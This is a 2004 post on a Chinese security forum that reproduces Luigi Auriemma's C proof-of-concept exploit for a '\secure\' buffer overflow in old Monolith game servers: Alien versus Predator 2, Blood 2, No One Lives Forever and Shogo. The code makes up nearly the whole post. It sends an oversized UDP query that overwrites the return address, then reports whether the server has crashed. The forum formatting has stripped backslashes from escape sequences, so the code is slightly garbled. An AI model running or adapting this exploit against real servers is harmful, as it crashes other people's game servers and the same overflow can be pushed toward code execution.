Limited secure buffer overflow in some old Monolith games

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6825
精华: 834
积分: 36073
阅读权限: 255
性别: 男
来自: 中国
在线时间: 590 小时
注册时间: 2004-6-25
最后登录: 2008-10-6

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-10-15 16:29 只看该作者

Limited secure buffer overflow in some old Monolith games

文章作者：aluigi@altervista.orgn

复制内容到剪贴板

代码:

/* 



by Luigi Auriemma 



*/ 



#include <stdio.h> 

#include <stdlib.h> 

#include <string.h> 

#include <time.h> 



#ifdef WIN32 

   #include <winsock.h> 

   #include "winerr.h" 



   #define close  closesocket 

#else 

   #include <unistd.h> 

   #include <sys/socket.h> 

   #include <sys/types.h> 

   #include <arpa/inet.h> 

   #include <net/inet.h> 

   #include <netdb.h> 

#endif 







#define VER    "0.1.1" 

#define PORT    27888 

#define TIMEOUT 3 

#define BUFFSZ  2048 

#define PCK    "\secure\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 

           "x55x44x33x22" 

           /* return address, each byte must be >= 0x20 and <= 0x7f */ 







void gs_info_udp(u_long ip, u_short port); 

int timeout(int sock); 

u_long resolv(char *host); 

void std_err(void); 







int main(int argc, char *argv[]) { 

   int    sd; 

   u_short port = PORT; 

   struct  sockaddr_in peer; 





   setbuf(stdout, NULL); 



   fputs("n" 

      "\secure\ buffer overflow in some old Monolith games "VER"n" 

      "by Luigi Auriemman" 

      "e-mail: [email]aluigi@altervista.orgn[/email]" 

      "web:    [url]http://aluigi.altervista.orgn[/url]" 

      "n", stdout); 



   if(argc < 2) { 

      printf("n" 

        "Usage: %s <server> [port(%d)]n" 

        "n" 

        "Vulnerable games         Latest versionsn" 

        "  Alien versus predator 2  1.0.9.6n" 

        "  Blood 2             2.1n" 

        "  No one lives forever     1.004n" 

        "  Shogo              2.2n" 

        "n" 

        "Note: the return address will be overwritten by 0x%08lxn" 

        "     (only the bytes from 0x20 to 0x7f are allowed)n" 

        "n", argv[0], port, *(u_long *)(PCK + 72)); 

      exit(1); 

   } 



#ifdef WIN32 

   WSADATA    wsadata; 

   WSAStartup(MAKEWORD(1,0), &wsadata); 

#endif 



   if(argc > 2) port = atoi(argv[2]); 



   peer.sin_addr.s_addr = resolv(argv[1]); 

   peer.sin_port      = htons(port); 

   peer.sin_family     = AF_INET; 



   printf("- target is %s:%hunn", 

      inet_ntoa(peer.sin_addr), port); 



   fputs("- Request informations:n", stdout); 

   gs_info_udp(peer.sin_addr.s_addr, port); 



   fputs("- Send BOOM packet:n", stdout); 

   sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); 

   if(sd < 0) std_err(); 

   if(sendto(sd, PCK, sizeof(PCK) - 1, 0, (struct sockaddr *)&peer, sizeof(peer)) 

    < 0) std_err(); 

   close(sd); 



   fputs("- Check server:n", stdout); 

   sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); 

   if(sd < 0) std_err(); 

   if(sendto(sd, "\status\", 8, 0, (struct sockaddr *)&peer, sizeof(peer)) 

    < 0) std_err(); 

   if(timeout(sd) < 0) { 

      fputs("nServer IS vulnerable!!!nn", stdout); 

   } else { 

      fputs("nServer doesn&#39;t seem vulnerablenn", stdout); 

   } 



   close(sd); 

   return(0); 

} 







void gs_info_udp(u_long ip, u_short port) { 

   struct  sockaddr_in peer; 

   int    sd, 

        len, 

        nt = 1; 

   u_char  buff[2048], 

        *p1, 

        *p2; 



   peer.sin_addr.s_addr = ip; 

   peer.sin_port      = htons(port); 

   peer.sin_family     = AF_INET; 



   sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); 

   if(sd < 0) std_err(); 



   if(sendto(sd, "\status\", 8, 0, (struct sockaddr *)&peer, sizeof(peer)) 

    < 0) std_err(); 



   if(timeout(sd) < 0) { 

      fputs("nError: socket timeout, no replies received. Probably the server doesn&#39;t support the Gamespy query protocol or the port is wrongnn", stdout); 

      close(sd); 

      exit(1); 

   } 



   len = recvfrom(sd, buff, sizeof(buff) - 1, 0, NULL, NULL); 

   if(len < 0) std_err(); 



   buff[len] = 0x00; 

   p1 = buff; 

   while((p2 = strchr(p1, &#39;\&#39;))) { 

      *p2 = 0x00; 



      if(!nt) { 

        if(!*p1) break; 

        printf("%30s: ", p1); 

        nt++; 

      } else { 

        printf("%sn", p1); 

        nt = 0; 

      } 

      p1 = p2 + 1; 

   } 

   printf("%snn", p1); 

   close(sd); 

} 







int timeout(int sock) { 

   struct  timeval tout; 

   fd_set  fd_read; 

   int    err; 



   tout.tv_sec = TIMEOUT; 

   tout.tv_usec = 0; 

   FD_ZERO(&fd_read); 

   FD_SET(sock, &fd_read); 

   err = select(sock + 1, &fd_read, NULL, NULL, &tout); 

   if(err < 0) std_err(); 

   if(!err) return(-1); 

   return(0); 

} 







u_long resolv(char *host) { 

   struct hostent *hp; 

   u_long host_ip; 



   host_ip = inet_addr(host); 

   if(host_ip == INADDR_NONE) { 

      hp = gethostbyname(host); 

      if(!hp) { 

        printf("nError: Unable to resolv hostname (%s)n", host); 

        exit(1); 

      } else host_ip = *(u_long *)hp->h_addr; 

   } 

   return(host_ip); 

} 







#ifndef WIN32 

   void std_err(void) { 

      perror("nError"); 

      exit(1); 

   } 

#endif

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Limited secure buffer overflow in some old Monolith games